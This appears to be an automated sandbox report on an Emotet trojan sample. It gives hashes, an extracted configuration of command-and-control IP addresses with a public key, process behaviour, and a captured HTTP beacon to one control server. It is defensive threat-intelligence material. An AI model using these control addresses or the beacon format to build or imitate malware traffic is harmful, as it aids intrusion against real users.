Analysis

  • max time kernel
    126s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    18-07-2020 17:13

General

  • Target

    a12f7407a7908f5aa24b5aa1dba973a3c4bbaad6d693ddfa089412a06ac7899d.exe

  • Size

    100KB

  • MD5

    b93528d4aa89c747eaae427f944ee337

  • SHA1

    50e3c13684b06fcbc31e1c4f2cda11c2fe773212

  • SHA256

    a12f7407a7908f5aa24b5aa1dba973a3c4bbaad6d693ddfa089412a06ac7899d

  • SHA512

    921d4637e0ca86de7ffe3b53c0ab8129d8d29a7fc9811418d44618b8ce69576708fe649267eeb195a8a4c45a75b10b08e2b7cde6c9c79faab1c17f2743aeaf4b

Score
10/10

Malware Config

Extracted

Family

emotet

C2

177.144.135.2:80

104.247.221.104:443

201.213.32.59:80

190.147.137.153:443

178.79.163.131:8080

190.17.195.202:80

212.71.237.140:8080

68.183.190.199:8080

12.162.84.2:8080

186.250.52.226:8080

181.129.96.162:8080

185.94.252.12:80

77.55.211.77:8080

177.72.13.80:80

70.32.115.157:8080

114.109.179.60:80

68.183.170.114:8080

5.196.35.138:7080

87.106.46.107:8080

190.163.1.31:8080

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6
3
uS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz
4
6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB
5
-----END PUBLIC KEY-----
6

Signatures

  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

Processes

  • C:\Users\Admin\AppData\Local\Temp\a12f7407a7908f5aa24b5aa1dba973a3c4bbaad6d693ddfa089412a06ac7899d.exe
    "C:\Users\Admin\AppData\Local\Temp\a12f7407a7908f5aa24b5aa1dba973a3c4bbaad6d693ddfa089412a06ac7899d.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: EnumeratesProcesses
    PID:1624

Network

  • flag-unknown
    POST
    http://177.144.135.2/jMxAncA/quN6xOEeXfACGVSp3X5/
    a12f7407a7908f5aa24b5aa1dba973a3c4bbaad6d693ddfa089412a06ac7899d.exe
    Remote address:
    177.144.135.2:80
    Request
    POST /jMxAncA/quN6xOEeXfACGVSp3X5/ HTTP/1.1
    Referer: http://177.144.135.2/jMxAncA/quN6xOEeXfACGVSp3X5/
    Content-Type: multipart/form-data; boundary=---------------------------186773967179314
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 177.144.135.2
    Content-Length: 4500
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 18 Jul 2020 17:13:46 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 132
    Connection: keep-alive
  • 177.144.135.2:80
    http://177.144.135.2/jMxAncA/quN6xOEeXfACGVSp3X5/
    http
    a12f7407a7908f5aa24b5aa1dba973a3c4bbaad6d693ddfa089412a06ac7899d.exe
    5.4kB
    580 B
    10
    7

    HTTP Request

    POST http://177.144.135.2/jMxAncA/quN6xOEeXfACGVSp3X5/

    HTTP Response

    200
  • 239.255.255.250:1900
    1.3kB
    8
  • 239.255.255.250:1900
  • 10.10.0.255:137
    netbios-ns
    1.1kB
    13
  • 10.10.0.40:137
    netbios-ns
    270 B
    3
  • 10.10.0.18:137
    netbios-ns
    270 B
    3
  • 10.10.0.30:137
    netbios-ns
    270 B
    3
  • 10.10.0.41:137
    netbios-ns
    270 B
    3

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1624-0-0x00000000009E0000-0x00000000009EC000-memory.dmp

    Filesize

    48KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.